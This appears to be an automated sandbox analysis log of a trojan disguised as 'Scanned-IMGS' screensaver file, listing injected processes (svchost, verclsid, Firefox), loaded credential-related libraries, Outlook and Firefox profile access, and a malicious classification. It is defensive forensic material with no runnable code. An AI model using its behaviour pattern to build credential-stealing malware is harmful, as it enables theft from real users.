                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0513CD1F
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050B8DBF
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0509ADE0
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050A0C00
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05140CB5
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05090CF2
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05142F30
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050E2F28
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050C0F30
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05114F40
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0511EFA0
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05092FC8
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0515EE26
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050A0E59
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0515CE93
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050B2E90
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0515EEDB
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050B6962
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050A29A0
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0516A9A6
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050A2840
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050AA840
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050868B8
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050CE8F0
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0515AB40
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05156BD7
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0509EA80
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05157571
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0513D5B0
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_051695C3
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0515F43F
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05091460
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0515F7B0
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050E5630
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_051516CC
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050D516C
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0508F172
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0516B16B
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050AB1B0
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050A70C0
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0514F0CC
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0515F0E0
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_051570E9
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0515132D
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0508D34C
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050E739A
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050A52A0
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050BB2C0
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_051412ED
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050BD2F0
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050A3D40
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05151D5A
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05157D73
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050BFDC0
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05119C32
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0515FCF2
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0515FF09
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050A1F92
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0515FFB1
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05063FD5
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05063FD2
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050A9EB0
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05135910
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050A9950
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050BB950
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0510D800
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050A38E0
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0515FB76
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050BFB80
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05115BF0
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050DDBF9
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05157A46
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0515FA49
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05113A6C
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050E5AA0
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05141AA3
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0513DAAC
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0514DAC6
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_03031D90
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0302AF68
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0302AF70
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0302CEF0
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0302CCC7
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0302CCD0
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0303363B
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_03033640
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_03035410
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0304BA80
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_04E0E6ED
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_04E0D7B8
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_04E0E238
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_04E0E353
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_04E0CA78
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_04E0CA3D
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: String function: 00470A30 appears 46 times
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: String function: 0046F9F2 appears 31 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0392B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03975130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 039AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 039BF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03987E54 appears 107 times
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: String function: 050E7E54 appears 107 times
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: String function: 0508B970 appears 262 times
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: String function: 0511F290 appears 103 times
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: String function: 0510EA12 appears 86 times
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: String function: 050D5130 appears 58 times
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe, 00000000.00000003.1699819205.0000000003CF3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Scanned-IMGS_from NomanGroup IDT.scr.exe
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe, 00000000.00000003.1702493783.000000000420D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Scanned-IMGS_from NomanGroup IDT.scr.exe
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@14/9
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_004C37B5 GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_004B10BF AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_004B16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_004C51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_004DA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_004C648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_004542A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe File created: C:\Users\user\AppData\Local\Temp\peaks
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: verclsid.exe, 00000003.00000002.3548335775.00000000033E3000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3548335775.0000000003405000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000003.2017590770.0000000003405000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe Virustotal: Detection: 36%
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe ReversingLabs: Detection: 44%
                Source: unknown Process created: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe"
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe"
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe Process created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"
                Source: C:\Windows\SysWOW64\verclsid.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe"
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe Process created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"
                Source: C:\Windows\SysWOW64\verclsid.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\verclsid.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\verclsid.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\verclsid.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe Static file information: File size 1613824 > 1048576
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zalkpCfMwtnpQo.exe, 00000002.00000002.3547860890.000000000013E000.00000002.00000001.01000000.00000004.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000002.3547855130.000000000013E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: Scanned-IMGS_from NomanGroup IDT.scr.exe, 00000000.00000003.1699361176.0000000003BD0000.00000004.00001000.00020000.00000000.sdmp, Scanned-IMGS_from NomanGroup IDT.scr.exe, 00000000.00000003.1701122516.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1729825920.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1829963241.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1829963241.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1731375904.0000000003700000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000003.1838981604.0000000004EB6000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3549867531.0000000005060000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3549867531.00000000051FE000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000003.00000003.1836979825.0000000004D01000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Scanned-IMGS_from NomanGroup IDT.scr.exe, 00000000.00000003.1699361176.0000000003BD0000.00000004.00001000.00020000.00000000.sdmp, Scanned-IMGS_from NomanGroup IDT.scr.exe, 00000000.00000003.1701122516.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1729825920.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1829963241.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1829963241.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1731375904.0000000003700000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, verclsid.exe, 00000003.00000003.1838981604.0000000004EB6000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3549867531.0000000005060000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3549867531.00000000051FE000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000003.00000003.1836979825.0000000004D01000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: verclsid.pdbGCTL source: svchost.exe, 00000001.00000003.1798236689.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1829844647.0000000003200000.00000004.00000020.00020000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000002.00000002.3548785048.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: verclsid.exe, 00000003.00000002.3548335775.0000000003385000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3550509142.000000000568C000.00000004.10000000.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000002.3549816270.000000000333C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2126594180.000000000FEAC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: verclsid.pdb source: svchost.exe, 00000001.00000003.1798236689.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1829844647.0000000003200000.00000004.00000020.00020000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000002.00000002.3548785048.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: verclsid.exe, 00000003.00000002.3548335775.0000000003385000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3550509142.000000000568C000.00000004.10000000.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000002.3549816270.000000000333C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2126594180.000000000FEAC000.00000004.80000000.00040000.00000000.sdmp
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_004542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004542DE
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_00470A76 push ecx; ret 0_2_00470A89
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041E80C push edx; iretw 1_2_0041E831
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00418036 push edx; retf 1_2_0041803B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040D0FD push edx; retf 1_2_0040D121
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041E898 push edx; iretw 1_2_0041E831
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00411953 push FFFFFFCFh; iretd 1_2_00411974
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004031A0 push eax; ret 1_2_004031A2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00418215 push esp; iretd 1_2_00418217
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040C32C push eax; iretd 1_2_0040C32E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00413B38 push ebp; retf 1_2_00413B4E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040D3EA push ebp; ret 1_2_0040D3EC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00413BF6 push cs; iretd 1_2_00413BF9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00401DE2 push eax; retf 1_2_00401DF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041A6D5 push eax; retf 1_2_0041A6DE
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00404EBD push edi; ret 1_2_00404EF7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00404F00 push edi; ret 1_2_00404EF7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004177C5 pushfd ; retn F88Bh 1_2_004177C2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040D7EB push es; iretd 1_2_0040D7F1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0390225F pushad ; ret 1_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039027FA pushad ; ret 1_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039309AD push ecx; mov dword ptr [esp], ecx 1_2_039309B6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0390283D push eax; iretd 1_2_03902858
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03901368 push eax; iretd 1_2_03901369
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050627FA pushad ; ret 3_2_050627F9
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0506225F pushad ; ret 3_2_050627F9
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050909AD push ecx; mov dword ptr [esp], ecx 3_2_050909B6
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0506283D push eax; iretd 3_2_05062858
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05061368 push eax; iretd 3_2_05061369
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0302E7B0 push FFFFFFCFh; iretd 3_2_0302E7D1
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_03034622 pushfd ; retn F88Bh 3_2_0303461F
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_030325CE push ds; retf 3_2_030325D9
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_0046F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0046F98E
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_004E1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004E1C41
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\verclsid.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\verclsid.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\verclsid.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
